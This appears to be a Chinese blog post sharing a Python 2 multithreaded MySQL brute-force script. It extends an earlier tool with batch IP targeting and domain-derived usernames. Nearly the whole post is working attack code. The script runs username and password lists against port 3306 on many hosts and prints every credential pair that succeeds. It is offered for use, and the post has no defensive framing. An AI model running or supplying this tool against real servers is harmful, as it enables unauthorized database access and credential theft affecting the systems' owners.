升级自:https://www.waitalone.cn/python-mysql-mult.html
在原基础上增加如下功能:
支持ip批量爆破,只需同目录存在ip.txt文件;
如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率;
去掉了端口和数据库的输入,默认了端口3306和数据库mysql。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, re, socket, time
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool
try:
import MySQLdb
except ImportError:
print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'
print '[!] http://www.codegood.com/archives/129'
exit()
def usage():
print '+' + '-' * 50 + '+'
print '\t Python MySQL批量爆破工具多线程版'
print '\t\t Time:2014-11-12'
print '+' + '-' * 50 + '+'
if len(sys.argv) != 4:
print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain或ip列表 用户名列表 密码列表"
print "实例: " + os.path.basename(sys.argv[0]) + " www.alin.cn或ip.txt user.txt pass.txt"
sys.exit()
def mysql_brute(user, password):
"mysql数据库破解函数"
db = None
try:
# print "user:", user, "password:", password
db = MySQLdb.connect(host=host, user=user, passwd=password, db="mysql", port=3306)
# print '[+] 破解成功:', user, password
result.append('ip:'+ host + '\t用户名:' + user + "\t密码:" + password)
print '[true] ip:'+ host + '\t用户名:' + user + "\t密码:" + password+'\n'
except KeyboardInterrupt:
print '大爷,按您的吩咐,已成功退出程序!'
exit()
except MySQLdb.Error, msg:
print '[false] ' + host+' '+user+':'+password+'\n'
finally:
if db:
db.close()
if __name__ == '__main__':
usage()
start_time = time.time()
if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
with open("tmp.txt","w") as f:
f.write(sys.argv[1])
ips = "tmp.txt"
elif re.match(r'\w+\.txt',sys.argv[1]):
ips = sys.argv[1]
else:
with open("tmp.txt","w") as f:
f.write(socket.gethostbyname(sys.argv[1]))
ips = "tmp.txt"
isExist = 0
isExist1 = 0
with open(sys.argv[2],'r') as tmp:
for line in tmp.readlines():
if sys.argv[1] in line:
isExist = 1
if isExist1 == 1:
break
if re.sub(r'\.\w+$','',sys.argv[1]) in line:
isExist1 = 1
if isExist == 1:
break
with open(sys.argv[2],"a") as f:
if isExist == 0:
f.write("\n"+sys.argv[1])
if isExist1 == 0:
f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))
iplist = [k.rstrip() for k in open(ips)]
userlist = [i.rstrip() for i in open(sys.argv[2])]
passlist = [j.rstrip() for j in open(sys.argv[3])]
print '\n[+] 目 标:%s \n' % sys.argv[1]
print '[+] 用户名:%d 条\n' % len(userlist)
print '[+] 密 码:%d 条\n' % len(passlist)
print '[!] 密码破解中,请稍候……\n'
result = []
for host in iplist:
for user in userlist:
partial_user = partial(mysql_brute, user)
pool = ThreadPool(10)
pool.map(partial_user, passlist)
pool.close()
pool.join()
if len(result) != 0:
print '[+] 恭喜大爷,MySQL密码破解成功!\n'
for x in {}.fromkeys(result).keys():
print x + '\n'
else:
print '[-] 杯具了大爷,MySQL密码破解失败!\n'
print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)
更多文章,请关注:开猿笔记
